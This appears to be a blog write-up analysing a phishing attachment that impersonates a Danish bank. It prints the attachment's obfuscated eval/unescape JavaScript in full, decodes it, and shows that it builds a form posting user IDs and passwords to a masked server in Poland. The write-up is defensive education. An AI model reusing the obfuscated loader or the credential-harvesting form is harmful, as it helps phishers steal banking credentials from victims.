Moving on to part 2 of the analysis of the actual phishing e-mail, let’s see what the form can tell us…
So the form exists in an html file. The next step is to analyze this file. I ‘ll open it with a text editor (Notepad ++), as I do not know yet if the file contains any malicious code, and see if there is something potentially malicious in the code contained in the html file.
There is an odd-looking JavaScript and an image, that is hosted in a domain, which at first sight does not belong to the Phishing-target bank group website (www.hackedsite1.dk).
First, I ‘ll try to view the image in a sandboxed browser.
The image no longer exists….
Image no longer there
Secondly, I’ ll examine the odd-looking JavaScript.
Odd-looking JavaScript? Is that a description which covers the JavaScript included it the code of the attached html file? No, it is not. This JavaScript contains obfuscated code.
“Obfuscation, in general, describes a practice that is used to intentionally make something more difficult to understand. In a programming context, it means to make code harder to understand or read, generally for privacy or security purposes. A tool called an obfuscator is sometimes used to convert a straight-forward program into one that works the same way but is much harder to understand.”
(http://searchsoftwarequality.techtarget.com/definition/obfuscation)
The person that sent this e-mail is certainly trying to make the code included in the html file harder to understand. But why? What does the code actually do? How can we find out?
The three questions stated before will be answered as soon as I de-obfuscate the JavaScript code to see what it actually does. However, before I do that it is worth seeing what JavaScript functions the sender is using to obfuscate the JavaScript code. On first sight the JavaScript is divided in two parts which use the eval() and unescape() functions as well as the “+” operator.
Check here for more
<script type=”text/javascript”>
<!–
eval(unescape(‘%66%75%6e%63%74%69%6f%6e%20%73%61%64%35%63%36%35%30%36%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%35%33%30%33%30%37%39%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%36%38%39%34%35%39%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%36%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a’));
eval(unescape(‘%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%73%61%64%35%63%36%35%30%36%28%27’) + ‘%30%68%6b%6b%60%12%5c%5b%66%6a%6d%6d%3e%1a%6a%6c%69%6d%3c%2e%2f%23%3a%29%2d%27%2b%20%31%2d%2f%23%29%2b%3c%3b%2f%2c%61%75%6f%2b%64%6f%56%58%74%20%63%66%6f%15%1c%6f%5d%69%65%61%59%31%14%63%6d%68%67%1a%12%6b%6f%4a%67%5b%61%6b%67%33%19%65%59%66%6d%6b%6f%12%77%5d%6e%6a%5a%5e%67%59%2a%6c%65%64%65%24%1a%3025303079%36%38%32%37%37%38%37’ + unescape(‘%27%29%29%3b’));
// –>
Odd-looking JavaScript
The unescape() function returns the ASCII string for the specified hexadecimal encoded value. It is a function deprecated above JavaScript 1.5 as it does not work properly for non-ASCII characters. (http://www.w3schools.com/jsref/jsref_unescape.asp, https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Functions). For example string “%66%75%6e%63%74%69%6f%6e” translates to “function” (see also ASCII table available on http://www.asciitable.com/).
Displaying JavaScript unescape() function
The eval() function evaluates a string of JavaScript code and executes any statements contained in the code. (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Functions#eval_Function, http://www.w3schools.com/jsref/jsref_eval.asp). So the snippet of code contained in the table below will produce an html page containing the text “Function evaluated correctly. Execution results to: 3”.
Demo JavaScript eval() function
<!DOCTYPE html>
<html>
<body>
<script>
var x = 30;
var y = 10;
var a = eval(“x / y”);
document.write (“Function evaluated correctly. Execution results to: ” + a);
</script>
</body>
</html>
E-mail header analysis
The result of the code snippet is shown in the following image .
Displaying JavaScript unescape() function
The “+” operator, as shown in the JavaScript code contained in the attached file, is used as a string concatenation operator, namely to concatenate different snippets of JavaScript code. In the code snippet in table above the ” document.write (“Function evaluated correctly. Execution results to: ” + a);” adds the 2 strings contained in the parentheses, namely “Function evaluated correctly. Execution results to: ” and the value of variable a, resulting in ” Function evaluated correctly. Execution results to: 3″.
The “+” operator of course is also the JavaScript arithmetic operator, namely it is also used to add numbers.
Finally, using the eval() function in combination with the unescape() function (“eval(unescape)“) means that the sender of the e-mail actually wants to decode his obscure (obfuscated) code and then execute it.
Now, having explained the obvious parts of the JavaScript code contained in the attached html file, let’s try to decode it. In order to do that I will use the JSDetox JavaScript malware analysis tool (http://www.relentless-coding.com/projects/jsdetox/). JSDetox is a tool used to support the manual analysis of malicious JavaScript code. It runs on its’ own web server on port 3000 (http://localhost:3000).
So I load the html attached file into JSDetox engine.
Loading attached html file into JSDetox engine
I have enabled the “execute eval” option, so that the eval() functions contained in the file’s JavaScript engine are executed. I click on the “Extract scripts” button in order to extract the scripts included in the html file.
Extracting scripts contained within the attached html file
I click the “Execute” button and I see that 3 actions are performed.
Actions executed by the scripts contained within the attached html file
As shown in the picture above the html file contains one script. The script performs 3 actions; it executes the 2 eval() functions, in order to finally emulate a call to the document.write method, namely to write to the html file, where the JavaScript code is contained (http://www.w3schools.com/jsref/met_doc_write.asp).
I will click the “Show Code” button for each of the performed actions so that I can see the steps the JavaScript code goes through.
Execution of the eval() function nr. 1
Eval() function nr. 1 creates a function called sad5c6506() that takes one argument (variable s).
Code created by eval() function nr. 1
Function sad5c6506(s) {
var r = “”;
var tmp = s.split(“25303079”);
s = unescape(tmp[0]);
k = unescape(tmp[1] + “689459”);
for( var i = 0; i<s.length; i++) {
r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+6);
}
return r;
}
Execution of eval() function nr. 2
Eval function nr. 2 calls the document.write method in order to write on the html file. Document.write writes on the html file the result of a call to the function, which eval() function nr. 1 created, namely function sad5c6506(s). The function in question takes as an argument an encoded string.
Code created by eval() function nr. 2
document.write(sad5c6506(‘%30%68%6b%6b%60%12%5c%5b%66%6a%6d%6d%3e%1a%6a%6c%69%6d%3c%2e%2f%23%3a%29%2d%27%2b%20%31%2d%2f%23%29%2b%3c%3b%2f%2c%61%75%6f%2b%64%6f%56%58%74%20%63%66%6f%15%1c%6f%5d%69%65%61%59%31%14%63%6d%68%67%1a%12%6b%6f%4a%67%5b%61%6b%67%33%19%65%59%66%6d%6b%6f%12%77%5d%6e%6a%5a%5e%67%59%2a%6c%65%64%65%24%1a%3025303079%36%38%32%37%37%38%37’));
Call to the document write.method
The sad5c6506(s) function decodes the encoded string to a form action that will be called by the form contained in the html file code. The action called is a post action, which is used to request that the origin server accepts the entity enclosed in the request as a new subordinate of the resource identified by the Request-URI in the Request-Line ((http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9.5). In short, the user’s input (user submitted data) is sent to a file specified in the code, usually residing in the same server as the form, which processes it.
Result of sad5c6506(s) execution
<form action=”http://xxx.xx.xx.143:81/nym/index.php” method=”post” onSubmit=”return validate(this)”>
So the html code of the attached html file is the following.
Html file containing the result of the JavaScript code
The html file that was attached to the received e-mail is a phishing form.
Attached html file
The phishing form pertains to be from Phishing-target Bank and asks for:
- Bruger-id -> User ID
- Adgangskode -> Password
- Adgangskode2 -> Password2
All the above asked items are mandatory. The values that the user enters are sent to “http://xxx.xx.xx.143:81/nym/index.php“, so they are processed by “index.php” hosted in a directory called nym. The web server is located in xxx.xx.xx.143 and listens on port 81 (not a normal web server port). Hmmm, now there is one more IP address to look at.
Let’s see. I call once again my favorite WHOis service (http://whois.domaintools.com) and I see that xxx.xx.xx.143 is located in Warsaw, Poland.
IP Information for xxx.xx.xx.143
IP Information for xxx.xx.xx.143
QuickStats
IP Location
Poland Warsaw xxxxxxxxxxxxxx
ASN
AS43xxx xxxxx-AS xxxxxxxxxx ,PL (registered Sep 11, 2007)
Whois Server
whois.ripe.net
IP Address
xxx.xx.xx.143
inetnum: xxx.xx.xx.0 – xxx.xx.xx.255
netname: xxxxxxxxxxxxx
descr: xxxxxxxxxxxxxx
descr: Axxxx. xxx
descr: 00-xxx Warszawa
country: PL
org: ORG-DPJA1-RIPE
admin-c: JJ16xx-RIPE
admin-c: JA9xx-RIPE
tech-c: DS14xxx-RIPE
tech-c: JJ1xxx-RIPE
status: ASSIGNED PI
mnt-by: DCENTER-MNT
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-routes: DCENTER-MNT
mnt-domains: DCENTER-MNT
source: RIPE # Filtered
organisation: ORG-DPJA1-RIPE
org-name: xxxxxxxxxxxxxxxxxxxxxxx
org-type: OTHER
address: Axxxx xxx
address: WARSZAWA
address: Poland
phone: +48 22 xxx xx xx
admin-c: JA937-RIPE
tech-c: JA9xx-RIPE
mnt-ref: NETIA-MNT
mnt-by: NETIA-MNT
source: RIPE # Filtered
person: Contact Person 3
address: xxxxxxxxxxxx
address: Warsaw, Poland
phone: +48 602 xxxxxx
nic-hdl: DS14145-RIPE
mnt-by: WN-MNT
source: RIPE # Filtered
person: Contact Person 4
address: xxxxxxxxxxxxx
address: xxxxx xxx
address: WARSZAWA
address: POLAND
phone: +48 (22) xxx xx xx
nic-hdl: JA9xx-RIPE
mnt-by: NETIA-MNT
source: RIPE # Filtered
person: Contact Person 5
address: xxxxxxxxxxxxx
address: Warsaw, Poland
phone: +48 695 1xxxxx
nic-hdl: JJ16xx-RIPE
mnt-by: LPPL-MNT
source: RIPE # Filtered
route: xxx.xx.xx.0/24
descr: xxxxxxxxxxxx
origin: AS43xxx
mnt-by: DCENTER-MNT
source: RIPE # Filtered
WHOis information for xxx.xx.xx.143
Finally, is ” http://xxx.xx.xx.143:81/nym/index.php” still alive? As shown below, it is not.
Is http://xxx.xx.xx.143:81/nym/index.php still alive?
Concluding, we have an e-mail seemingly from a Danish bank, sent from Russia, which contains a form that sends the filled data to a server in Poland. Does not sound legit? Does it? Certainly not!
So…lessons learned (simple users):
- Banks do not inform us that our card will be suspended by e-mail.
- Banks do not ask us about our credentials, etc by e-mail.
- Phishing is easy to do and easy to identify.
- Always talk to your bank (certainly not on a phone included in an e-mail) and stay vigilant.
And lessons learned (more advanced users)…
- E-mail headers contain a lot of info. Know what to look for.
- WHOis is our friend. It tells us a lot.
- Phishers / malware writers love obfuscation.
- Obfuscation is usually a sign of illicit activity.
DISCLAIMER
This article is written for scientific purposes. It aims to:
- educate simple users on how to identify phishing e-mails and what they should be careful of in order not to get phished and
- educate more advanced users in phishers' techniques and how these can be analyzed.